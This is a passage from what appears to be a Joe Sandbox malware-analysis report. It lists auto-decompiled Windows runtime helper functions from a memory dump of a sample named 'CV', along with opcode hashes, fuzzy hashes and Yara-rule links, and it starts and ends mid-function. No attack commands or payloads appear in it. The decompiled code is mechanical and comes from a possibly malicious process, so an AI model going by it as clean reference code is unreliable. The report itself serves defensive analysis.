				return L01264620(_t5,  *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _a4);
			}

0x01263a35

Memory Dump Source

Source File: 00000008.00000002.418379413.0000000001220000.00000040.00000800.00020000.00000000.sdmp, Offset: 01220000, based on PE: true

Associated: 00000008.00000002.420558775.000000000133B000.00000040.00000800.00020000.00000000.sdmpDownload File
Associated: 00000008.00000002.420581212.000000000133F000.00000040.00000800.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_1220000_CV.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 96eed22535127586772c7987771c80cba013ba6a1ffa665a55b2596939b117e5
Instruction ID: f61eb5f1a1a22de9c9e3f1ae7c1464e5c1e09be50e1aedc1a224051d4685f9ba
Opcode Fuzzy Hash: 96eed22535127586772c7987771c80cba013ba6a1ffa665a55b2596939b117e5
Instruction Fuzzy Hash: 8CC08C32080288BBC7126E41DC00F127B2DE7A0B60F000020BA040A5A08532ECA0D588

Uniqueness

Uniqueness Score: -1.00%

Function 012576E2 Relevance: .0, Instructions: 10
COMMON

Download Yara Rule

C-Code - Quality: 100%

			E012576E2(void* __ecx) {
				void* _t5;

				if(__ecx != 0 && ( *(__ecx + 0x20) & 0x00000040) == 0) {
					return L012677F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, __ecx);
				}
				return _t5;
			}

0x012576e4
0x00000000
0x012576f8
0x012576fd

Memory Dump Source

Source File: 00000008.00000002.418379413.0000000001220000.00000040.00000800.00020000.00000000.sdmp, Offset: 01220000, based on PE: true

Associated: 00000008.00000002.420558775.000000000133B000.00000040.00000800.00020000.00000000.sdmpDownload File
Associated: 00000008.00000002.420581212.000000000133F000.00000040.00000800.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_1220000_CV.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 779d3b12954878cff5fec068ca9c86adddf3072d6236c1739843d2e534c1de0a
Instruction ID: 2d68aa2716012ddcd972442401028a6c3ac80912781bd468396ce0c568c61f9f
Opcode Fuzzy Hash: 779d3b12954878cff5fec068ca9c86adddf3072d6236c1739843d2e534c1de0a
Instruction Fuzzy Hash: ECC08C701B11825EEB2B570CCE60B303A54AB08608F88019CAF01094E2C37CA802C218

Uniqueness

Uniqueness Score: -1.00%

Function 012736CC Relevance: .0, Instructions: 10
COMMON

Download Yara Rule

C-Code - Quality: 100%

			E012736CC(void* __ecx) {

				if(__ecx > 0x7fffffff) {
					return 0;
				} else {
					return L01264620(__ecx,  *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, __ecx);
				}
			}

0x012736d2
0x012736e8
0x012736d4
0x012736e5
0x012736e5

Memory Dump Source

Source File: 00000008.00000002.418379413.0000000001220000.00000040.00000800.00020000.00000000.sdmp, Offset: 01220000, based on PE: true

Associated: 00000008.00000002.420558775.000000000133B000.00000040.00000800.00020000.00000000.sdmpDownload File
Associated: 00000008.00000002.420581212.000000000133F000.00000040.00000800.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_1220000_CV.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 4f3d4ce0a081fc3392adb3a1b0c88d62f1a47c6b625de355985342774c730a51
Instruction ID: 5a5de09a2eb51eb868eea524d0cee719c7433e7c504a58380233ae8004d37ef0
Opcode Fuzzy Hash: 4f3d4ce0a081fc3392adb3a1b0c88d62f1a47c6b625de355985342774c730a51
Instruction Fuzzy Hash: F4C02B701B0480FFD7156F30CD50F267298F700A21F6403547320454F0D538DC00E104

Uniqueness

Uniqueness Score: -1.00%

Function 01267D50 Relevance: .0, Instructions: 7
COMMON

Download Yara Rule

C-Code - Quality: 100%

			E01267D50() {
				intOrPtr* _t3;

				_t3 =  *((intOrPtr*)( *[fs:0x30] + 0x50));
				if(_t3 != 0) {
					return  *_t3;
				} else {
					return _t3;
				}
			}

0x01267d56
0x01267d5b
0x01267d60
0x01267d5d
0x01267d5d
0x01267d5d

Memory Dump Source

Source File: 00000008.00000002.418379413.0000000001220000.00000040.00000800.00020000.00000000.sdmp, Offset: 01220000, based on PE: true

Associated: 00000008.00000002.420558775.000000000133B000.00000040.00000800.00020000.00000000.sdmpDownload File
Associated: 00000008.00000002.420581212.000000000133F000.00000040.00000800.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_1220000_CV.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: d8f8299b16f752bf61d1185b43a99e53329511a2be3aa4238e34382007679d93
Instruction ID: d6d1971a831c029f18041c7a7677c33e9c912c4afd3591480383c9a9c5f88a76
Opcode Fuzzy Hash: d8f8299b16f752bf61d1185b43a99e53329511a2be3aa4238e34382007679d93
Instruction Fuzzy Hash: 15B092353119418FDE16DF18C080B1533E8BB44A44F8404D0E400CBA21D329E8408900

Uniqueness

Uniqueness Score: -1.00%

Function 01272ACB Relevance: .0, Instructions: 5
COMMON

Download Yara Rule

C-Code - Quality: 100%

			E01272ACB() {
				void* _t5;

				return E0125EB70(_t5,  *((intOrPtr*)( *[fs:0x30] + 0x1c)));
			}

0x01272adc

Memory Dump Source

Source File: 00000008.00000002.418379413.0000000001220000.00000040.00000800.00020000.00000000.sdmp, Offset: 01220000, based on PE: true

Associated: 00000008.00000002.420558775.000000000133B000.00000040.00000800.00020000.00000000.sdmpDownload File
Associated: 00000008.00000002.420581212.000000000133F000.00000040.00000800.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_1220000_CV.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 15609d918e1561f37e97de8b3878496f5feb00f452f9af5c60cfc93e4e46d55a
Instruction ID: 54d81b363ba12f90e377ebc0f4eaba69977323a44830056f305bab5a4d4f80c9
Opcode Fuzzy Hash: 15609d918e1561f37e97de8b3878496f5feb00f452f9af5c60cfc93e4e46d55a
Instruction Fuzzy Hash: B2B01232C20441CFCF42EF40C650B2DB331FB00750F064490940127930C238AD01CB40

Uniqueness

Uniqueness Score: -1.00%

Function 01289520 Relevance: .0, Instructions: 4COMMONLIBRARYCODE

Download Yara Rule

Memory Dump Source

Source File: 00000008.00000002.418379413.0000000001220000.00000040.00000800.00020000.00000000.sdmp, Offset: 01220000, based on PE: true

Associated: 00000008.00000002.420558775.000000000133B000.00000040.00000800.00020000.00000000.sdmpDownload File
Associated: 00000008.00000002.420581212.000000000133F000.00000040.00000800.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_1220000_CV.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 72822734350fdada456dd27289a29b129c4d2524846db11d4c8ced82baceff57
Instruction ID: 096516fbfd8d8627c4187fd63fdb0980958cbe97f129ae293f0b215069ba1cf2
Opcode Fuzzy Hash: 72822734350fdada456dd27289a29b129c4d2524846db11d4c8ced82baceff57
Instruction Fuzzy Hash: FA9002E1211184924A00A2AD8504B0A4505A7E0241B51C016E1044560CC5658C51B275

Uniqueness

Uniqueness Score: -1.00%

Function 0128AD30 Relevance: .0, Instructions: 4COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000008.00000002.418379413.0000000001220000.00000040.00000800.00020000.00000000.sdmp, Offset: 01220000, based on PE: true

Associated: 00000008.00000002.420558775.000000000133B000.00000040.00000800.00020000.00000000.sdmpDownload File
Associated: 00000008.00000002.420581212.000000000133F000.00000040.00000800.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_1220000_CV.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 8aac67d2f52e2cf17fde3fda6c5b62b943430e65dde3864a3021efa4e59479ee
Instruction ID: 6166040d7ab21a6747734362be701002537853d9c123606764d0cc97a0b57558
Opcode Fuzzy Hash: 8aac67d2f52e2cf17fde3fda6c5b62b943430e65dde3864a3021efa4e59479ee
Instruction Fuzzy Hash: E3900271A1504412964071AD49146464006B7E0781B55C011A0504554CC9948E5573F1

Uniqueness

Uniqueness Score: -1.00%

Function 01289560 Relevance: .0, Instructions: 4COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000008.00000002.418379413.0000000001220000.00000040.00000800.00020000.00000000.sdmp, Offset: 01220000, based on PE: true

Associated: 00000008.00000002.420558775.000000000133B000.00000040.00000800.00020000.00000000.sdmpDownload File
Associated: 00000008.00000002.420581212.000000000133F000.00000040.00000800.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_1220000_CV.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: a74b4d0f4a222e0277a77587f529dc47c721e5c5b2ac4e65710e7ab4a1b09c82
Instruction ID: 35d6462f455225478e0400d43ca134b68c5169b83024af8bfe5c9e38cfb62d1a
Opcode Fuzzy Hash: a74b4d0f4a222e0277a77587f529dc47c721e5c5b2ac4e65710e7ab4a1b09c82
Instruction Fuzzy Hash: 71900265231044020645A5AD070450B0445B7D6391391C015F1406590CC6618C657371

Uniqueness

Uniqueness Score: -1.00%

Function 01289950 Relevance: .0, Instructions: 4COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000008.00000002.418379413.0000000001220000.00000040.00000800.00020000.00000000.sdmp, Offset: 01220000, based on PE: true

Associated: 00000008.00000002.420558775.000000000133B000.00000040.00000800.00020000.00000000.sdmpDownload File
Associated: 00000008.00000002.420581212.000000000133F000.00000040.00000800.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_1220000_CV.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: ae1d975c13eb35d8e6a02b0d46bf2c3c8366c7933cc875760a5d76491d217f3f
Instruction ID: 55b245c4774fff5bd31f3c32b53e250a69cb2030c1eb2a28898523b998e4aa1f
Opcode Fuzzy Hash: ae1d975c13eb35d8e6a02b0d46bf2c3c8366c7933cc875760a5d76491d217f3f
Instruction Fuzzy Hash: 2B9002A121144803D64065AD49046070005A7D0342F51C011A2054555ECA698C517275

Uniqueness

Uniqueness Score: -1.00%

Function 012895F0 Relevance: .0, Instructions: 4COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000008.00000002.418379413.0000000001220000.00000040.00000800.00020000.00000000.sdmp, Offset: 01220000, based on PE: true

Associated: 00000008.00000002.420558775.000000000133B000.00000040.00000800.00020000.00000000.sdmpDownload File
Associated: 00000008.00000002.420581212.000000000133F000.00000040.00000800.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_1220000_CV.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 35a6e1e9e03ae7d474f700c1ecb00c6c42ef270da222ed5e825f1e079a5ad9b6
Instruction ID: 88ee441ebc56b42c6ec29b732888c388aa81bbf13d4167ac8ce6406e5a3c82d5
Opcode Fuzzy Hash: 35a6e1e9e03ae7d474f700c1ecb00c6c42ef270da222ed5e825f1e079a5ad9b6
Instruction Fuzzy Hash: 3C90027121104C02D60461AD49046860005A7D0341F51C011A6014655ED6A58C917271

Uniqueness

Uniqueness Score: -1.00%

Function 012899D0 Relevance: .0, Instructions: 4COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000008.00000002.418379413.0000000001220000.00000040.00000800.00020000.00000000.sdmp, Offset: 01220000, based on PE: true

Associated: 00000008.00000002.420558775.000000000133B000.00000040.00000800.00020000.00000000.sdmpDownload File
Associated: 00000008.00000002.420581212.000000000133F000.00000040.00000800.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_1220000_CV.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 579d8a5e341441f91ad3c44db1b64d513e7a8e2e7c7a55520f00996c0f1576ae
Instruction ID: a27f95909fda4a06beefd5e3ec88be40720a5833e881babd37bd534f5e2aaa79
Opcode Fuzzy Hash: 579d8a5e341441f91ad3c44db1b64d513e7a8e2e7c7a55520f00996c0f1576ae
Instruction Fuzzy Hash: CD9002A122104442D60461AD45047060045A7E1241F51C012A2144554CC5698C617275

Uniqueness

Uniqueness Score: -1.00%

Function 01289820 Relevance: .0, Instructions: 4COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000008.00000002.418379413.0000000001220000.00000040.00000800.00020000.00000000.sdmp, Offset: 01220000, based on PE: true

Associated: 00000008.00000002.420558775.000000000133B000.00000040.00000800.00020000.00000000.sdmpDownload File
Associated: 00000008.00000002.420581212.000000000133F000.00000040.00000800.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_1220000_CV.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 06a548c3287324d43e0b2d8ee657a483f45f737248bcbd3d8929c90a46c70d49
Instruction ID: d37564ca91ffb5b6f3000bc868ffb9ac75ef7c3a2bfc320cf41f78373ed07cb7
Opcode Fuzzy Hash: 06a548c3287324d43e0b2d8ee657a483f45f737248bcbd3d8929c90a46c70d49
Instruction Fuzzy Hash: D390027125104802D64171AD45046060009B7D0281F91C012A0414554EC6958E56BBB1

Uniqueness

Uniqueness Score: -1.00%

Function 0128B040 Relevance: .0, Instructions: 4COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000008.00000002.418379413.0000000001220000.00000040.00000800.00020000.00000000.sdmp, Offset: 01220000, based on PE: true

Associated: 00000008.00000002.420558775.000000000133B000.00000040.00000800.00020000.00000000.sdmpDownload File
Associated: 00000008.00000002.420581212.000000000133F000.00000040.00000800.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_1220000_CV.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: e76edeadf818ac6c3294c7431a3d131b1d66eaee8e19b441dc718fc25609705d
Instruction ID: 3292a8f28620182677fdf6b8c73a8441132875dff0ca23490809cded7454655e
Opcode Fuzzy Hash: e76edeadf818ac6c3294c7431a3d131b1d66eaee8e19b441dc718fc25609705d
Instruction Fuzzy Hash: 3C9002A1611184434A40B1AD49044065015B7E1341391C121A0444560CC6A88C55B3B5

Uniqueness

Uniqueness Score: -1.00%

Function 012898A0 Relevance: .0, Instructions: 4COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000008.00000002.418379413.0000000001220000.00000040.00000800.00020000.00000000.sdmp, Offset: 01220000, based on PE: true

Associated: 00000008.00000002.420558775.000000000133B000.00000040.00000800.00020000.00000000.sdmpDownload File
Associated: 00000008.00000002.420581212.000000000133F000.00000040.00000800.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_1220000_CV.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 34bc4aab30e4f8d3b3df3f0a28269eb7e6ff8b112cd199b7a2dd61e736e21dc7
Instruction ID: cc369f4d0b2b49a74958cc6483521319c10afffa143e0b561312284ba39113ad
Opcode Fuzzy Hash: 34bc4aab30e4f8d3b3df3f0a28269eb7e6ff8b112cd199b7a2dd61e736e21dc7
Instruction Fuzzy Hash: 2C90026131104802D60261AD45146060009E7D1385F91C012E1414555DC6658D53B272

Uniqueness

Uniqueness Score: -1.00%

Function 01289730 Relevance: .0, Instructions: 4COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000008.00000002.418379413.0000000001220000.00000040.00000800.00020000.00000000.sdmp, Offset: 01220000, based on PE: true

Associated: 00000008.00000002.420558775.000000000133B000.00000040.00000800.00020000.00000000.sdmpDownload File
Associated: 00000008.00000002.420581212.000000000133F000.00000040.00000800.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_1220000_CV.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 49110d957a243031018e0ed50f675d337a21a956db3af4d9e54f5f8d73d8f2df
Instruction ID: c02eb384e13b1a163e52b060ab297b892eafae536cc0147425fcf321b18e7e12
Opcode Fuzzy Hash: 49110d957a243031018e0ed50f675d337a21a956db3af4d9e54f5f8d73d8f2df
Instruction Fuzzy Hash: 8390026161504802D64071AD55187060015A7D0241F51D011A0014554DC6998E5577F1

Uniqueness

Uniqueness Score: -1.00%

Function 01289B00 Relevance: .0, Instructions: 4COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000008.00000002.418379413.0000000001220000.00000040.00000800.00020000.00000000.sdmp, Offset: 01220000, based on PE: true

Associated: 00000008.00000002.420558775.000000000133B000.00000040.00000800.00020000.00000000.sdmpDownload File
Associated: 00000008.00000002.420581212.000000000133F000.00000040.00000800.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_1220000_CV.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: d360de76f28bfc3d17928999687ac4a67d43c235c08eceaae9393f58fe4c27a0
Instruction ID: fc89964f84dc1d1deedef3ade0044a462d13c483d2ccfdf8815ea04677e76577
Opcode Fuzzy Hash: d360de76f28bfc3d17928999687ac4a67d43c235c08eceaae9393f58fe4c27a0
Instruction Fuzzy Hash: 7B90026125104C02D64071AD85147070006E7D0641F51C011A0014554DC6568D6577F1

Uniqueness

Uniqueness Score: -1.00%

Function 0128A710 Relevance: .0, Instructions: 4COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000008.00000002.418379413.0000000001220000.00000040.00000800.00020000.00000000.sdmp, Offset: 01220000, based on PE: true

Associated: 00000008.00000002.420558775.000000000133B000.00000040.00000800.00020000.00000000.sdmpDownload File
Associated: 00000008.00000002.420581212.000000000133F000.00000040.00000800.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_1220000_CV.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: b3027623789b0436ceb27fd73614fb15fa3aa79cba58a02f2c8cd584cd17a631
Instruction ID: 05ee7e136acb83989eaa4c5a6da42dd61bc8e9f033809b8e751e3b4db00ea7b4
Opcode Fuzzy Hash: b3027623789b0436ceb27fd73614fb15fa3aa79cba58a02f2c8cd584cd17a631
Instruction Fuzzy Hash: 64900271311044529A00A6ED5904A4A4105A7F0341B51D015A4004554CC5948C617271

Uniqueness

Uniqueness Score: -1.00%

Function 01289760 Relevance: .0, Instructions: 4COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000008.00000002.418379413.0000000001220000.00000040.00000800.00020000.00000000.sdmp, Offset: 01220000, based on PE: true

Associated: 00000008.00000002.420558775.000000000133B000.00000040.00000800.00020000.00000000.sdmpDownload File
Associated: 00000008.00000002.420581212.000000000133F000.00000040.00000800.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_1220000_CV.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 02827767386bf199e2b19a8b4e334fe8797c36af615f2e9a0b1f8b6631bf6bd2
Instruction ID: c9fb50cc9406ee231df931c86ba8b2679a9a2fa5f985ead5ac4f3dae396ce760
Opcode Fuzzy Hash: 02827767386bf199e2b19a8b4e334fe8797c36af615f2e9a0b1f8b6631bf6bd2
Instruction Fuzzy Hash: 8090027121104803D60061AD56087070005A7D0241F51D411A0414558DD6968C517271

Uniqueness

Uniqueness Score: -1.00%

Function 01289770 Relevance: .0, Instructions: 4COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000008.00000002.418379413.0000000001220000.00000040.00000800.00020000.00000000.sdmp, Offset: 01220000, based on PE: true

Associated: 00000008.00000002.420558775.000000000133B000.00000040.00000800.00020000.00000000.sdmpDownload File
Associated: 00000008.00000002.420581212.000000000133F000.00000040.00000800.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_1220000_CV.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 4e94fecf006963660320250b47145f88d28d29c725c47d717c4a435656b61784
Instruction ID: 6ab0774e6f7e16d6a4968ba1b35f37d2a021952be789279c9fb48fbcdf7f9f67
Opcode Fuzzy Hash: 4e94fecf006963660320250b47145f88d28d29c725c47d717c4a435656b61784
Instruction Fuzzy Hash: 7590026121508842D60065AD5508A060005A7D0245F51D011A1054595DC6758C51B271

Uniqueness

Uniqueness Score: -1.00%

Function 0128A770 Relevance: .0, Instructions: 4COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000008.00000002.418379413.0000000001220000.00000040.00000800.00020000.00000000.sdmp, Offset: 01220000, based on PE: true

Associated: 00000008.00000002.420558775.000000000133B000.00000040.00000800.00020000.00000000.sdmpDownload File
Associated: 00000008.00000002.420581212.000000000133F000.00000040.00000800.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_1220000_CV.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 4748241a58c3f6eeea4b2e9ee5bfb06598f59e40ecd30d1527855de5d2598c32
Instruction ID: 460e92a096b1efa66f0129c5603cedab66c699faf4fcd468090a0f2b65dcbe5c
Opcode Fuzzy Hash: 4748241a58c3f6eeea4b2e9ee5bfb06598f59e40ecd30d1527855de5d2598c32
Instruction Fuzzy Hash: 2C90027521508842DA0065AD5904A870005A7D0345F51D411A041459CDC6948C61B271

Uniqueness

Uniqueness Score: -1.00%

Function 0128A3B0 Relevance: .0, Instructions: 4COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000008.00000002.418379413.0000000001220000.00000040.00000800.00020000.00000000.sdmp, Offset: 01220000, based on PE: true

Associated: 00000008.00000002.420558775.000000000133B000.00000040.00000800.00020000.00000000.sdmpDownload File
Associated: 00000008.00000002.420581212.000000000133F000.00000040.00000800.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_1220000_CV.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 2b4b34da4df2f0047d6e630ba7f0ce8f7e6b2bd4323e18ba2a1b57b1c674295d
Instruction ID: 2ea973bf63c1073a6dc101484a55d0777e7a3b1389bb8e4e542fb2ccc70c56d7
Opcode Fuzzy Hash: 2b4b34da4df2f0047d6e630ba7f0ce8f7e6b2bd4323e18ba2a1b57b1c674295d
Instruction Fuzzy Hash: 9890027121148402D64071AD854460B5005B7E0341F51C411E0415554CC6558C56B371

Uniqueness

Uniqueness Score: -1.00%

Function 01289610 Relevance: .0, Instructions: 4COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000008.00000002.418379413.0000000001220000.00000040.00000800.00020000.00000000.sdmp, Offset: 01220000, based on PE: true

Associated: 00000008.00000002.420558775.000000000133B000.00000040.00000800.00020000.00000000.sdmpDownload File
Associated: 00000008.00000002.420581212.000000000133F000.00000040.00000800.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_1220000_CV.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: e1a8048486f9a89bc6a0a008b7b5a42dba6833d2b018ad8c32b08d590b4f7773
Instruction ID: bca8c70a8096396c2c5a38222073e7ae50ea156f6e52ca463383e97a30778008
Opcode Fuzzy Hash: e1a8048486f9a89bc6a0a008b7b5a42dba6833d2b018ad8c32b08d590b4f7773
Instruction Fuzzy Hash: 1390027161504C02D65071AD45147460005A7D0341F51C011A0014654DC7958E5577F1

Uniqueness

Uniqueness Score: -1.00%

Function 01289A10 Relevance: .0, Instructions: 4COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000008.00000002.418379413.0000000001220000.00000040.00000800.00020000.00000000.sdmp, Offset: 01220000, based on PE: true

Associated: 00000008.00000002.420558775.000000000133B000.00000040.00000800.00020000.00000000.sdmpDownload File
Associated: 00000008.00000002.420581212.000000000133F000.00000040.00000800.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_1220000_CV.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: f27fab49b4feaa6fc96905db34a2a7daf65080f436e9f48905b43ca2131c5c6c
Instruction ID: 3f3d4e4340ec6ca5b40dd7ea622566a1e52de60840261f53946de31568b8416c
Opcode Fuzzy Hash: f27fab49b4feaa6fc96905db34a2a7daf65080f436e9f48905b43ca2131c5c6c
Instruction Fuzzy Hash: C790027121144802D60061AD49087470005A7D0342F51C011A5154555EC6A5CC917671

Uniqueness

Uniqueness Score: -1.00%

Function 01289650 Relevance: .0, Instructions: 4COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000008.00000002.418379413.0000000001220000.00000040.00000800.00020000.00000000.sdmp, Offset: 01220000, based on PE: true

Associated: 00000008.00000002.420558775.000000000133B000.00000040.00000800.00020000.00000000.sdmpDownload File
Associated: 00000008.00000002.420581212.000000000133F000.00000040.00000800.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_1220000_CV.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: a2d4b095c14d26d73b3f7cc3a82833e760916df81b25a658add1337f9fa20c9a
Instruction ID: e150d180d1b42b9c51731b0410115260570e76b926b6c729466ae51ccc16f187
Opcode Fuzzy Hash: a2d4b095c14d26d73b3f7cc3a82833e760916df81b25a658add1337f9fa20c9a
Instruction Fuzzy Hash: 3A90027121508C42D64071AD4504A460015A7D0345F51C011A0054694DD6658D55B7B1

Uniqueness

Uniqueness Score: -1.00%

Function 01289A80 Relevance: .0, Instructions: 4COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000008.00000002.418379413.0000000001220000.00000040.00000800.00020000.00000000.sdmp, Offset: 01220000, based on PE: true

Associated: 00000008.00000002.420558775.000000000133B000.00000040.00000800.00020000.00000000.sdmpDownload File
Associated: 00000008.00000002.420581212.000000000133F000.00000040.00000800.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_1220000_CV.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: c4f9f6366d427e49c807b1fd404540768369f8aeeb16d81ae24bae8ef76825be
Instruction ID: 6de7b09e11f4bde937728e77296bbb3770cfdeaf1a1e9dbcae4ee9d65d9125f0
Opcode Fuzzy Hash: c4f9f6366d427e49c807b1fd404540768369f8aeeb16d81ae24bae8ef76825be
Instruction Fuzzy Hash: 7D90026121148842D64062AD4904B0F4105A7E1242F91C019A4146554CC9558C557771

Uniqueness

Uniqueness Score: -1.00%

Function 012896D0 Relevance: .0, Instructions: 4COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000008.00000002.418379413.0000000001220000.00000040.00000800.00020000.00000000.sdmp, Offset: 01220000, based on PE: true

Associated: 00000008.00000002.420558775.000000000133B000.00000040.00000800.00020000.00000000.sdmpDownload File
Associated: 00000008.00000002.420581212.000000000133F000.00000040.00000800.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_1220000_CV.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 61b4f104af15f4210cbae3bc43749fbb48197c868b32b9396a8a8ff0cd8c10ff
Instruction ID: 7be6b7cee0d34b7634e105b03a7e886bb4a5c25decebcc23522e5fee726d0185
Opcode Fuzzy Hash: 61b4f104af15f4210cbae3bc43749fbb48197c868b32b9396a8a8ff0cd8c10ff
Instruction Fuzzy Hash: 3D90027121104C42D60061AD4504B460005A7E0341F51C016A0114654DC655CC517671

Uniqueness

Uniqueness Score: -1.00%

Function 01289670 Relevance: .0, Instructions: 2COMMONLIBRARYCODE

Download Yara Rule

Memory Dump Source

Source File: 00000008.00000002.418379413.0000000001220000.00000040.00000800.00020000.00000000.sdmp, Offset: 01220000, based on PE: true

Associated: 00000008.00000002.420558775.000000000133B000.00000040.00000800.00020000.00000000.sdmpDownload File
Associated: 00000008.00000002.420581212.000000000133F000.00000040.00000800.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_1220000_CV.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: a3d3d3c0123cddb368cc51eab9da9c3aaeeac76cd7bbfae310620ba6f7f49b43
Instruction ID: c1446ab3ffeb69ee43cb1c6bdfe0b14f3165f57da4655a3a49fea3960b9434fb
Opcode Fuzzy Hash: a3d3d3c0123cddb368cc51eab9da9c3aaeeac76cd7bbfae310620ba6f7f49b43
Instruction Fuzzy Hash:

Uniqueness

Uniqueness Score: -1.00%

Function 0127645B Relevance: 5.4, APIs: 1, Strings: 2, Instructions: 109
timeCOMMON

Download Yara Rule

C-Code - Quality: 26%

			E0127645B(void* __ecx, intOrPtr __edx, intOrPtr _a4) {
				signed int _v8;
				void* _v36;
				intOrPtr _v48;
				intOrPtr _v52;
				intOrPtr _v56;
				char _v60;
				char _v64;
				intOrPtr _v68;
				intOrPtr _v72;
				intOrPtr _v76;
				intOrPtr _v80;
				void* __ebx;
				void* __edi;
				void* __esi;
				intOrPtr _t48;
				intOrPtr _t49;
				intOrPtr _t50;
				intOrPtr* _t52;
				char _t56;
				void* _t69;
				char _t72;
				void* _t73;
				intOrPtr _t75;
				intOrPtr _t79;
				void* _t82;
				void* _t84;
				intOrPtr _t86;
				void* _t88;
				signed int _t90;
				signed int _t92;
				signed int _t93;

				_t80 = __edx;
				_t92 = (_t90 & 0xfffffff8) - 0x4c;
				_v8 =  *0x133d360 ^ _t92;
				_t72 = 0;
				_v72 = __edx;
				_t82 = __ecx;
				_t86 =  *((intOrPtr*)(__edx + 0xc8));
				_v68 = _t86;
				E0128FA60( &_v60, 0, 0x30);
				_t48 =  *((intOrPtr*)(_t82 + 0x70));
				_t93 = _t92 + 0xc;
				_v76 = _t48;
				_t49 = _t48;
				if(_t49 == 0) {
					_push(5);
					 *((char*)(_t82 + 0x6a)) = 0;
					 *((intOrPtr*)(_t82 + 0x6c)) = 0;
					goto L3;
				} else {
					_t69 = _t49 - 1;
					if(_t69 != 0) {
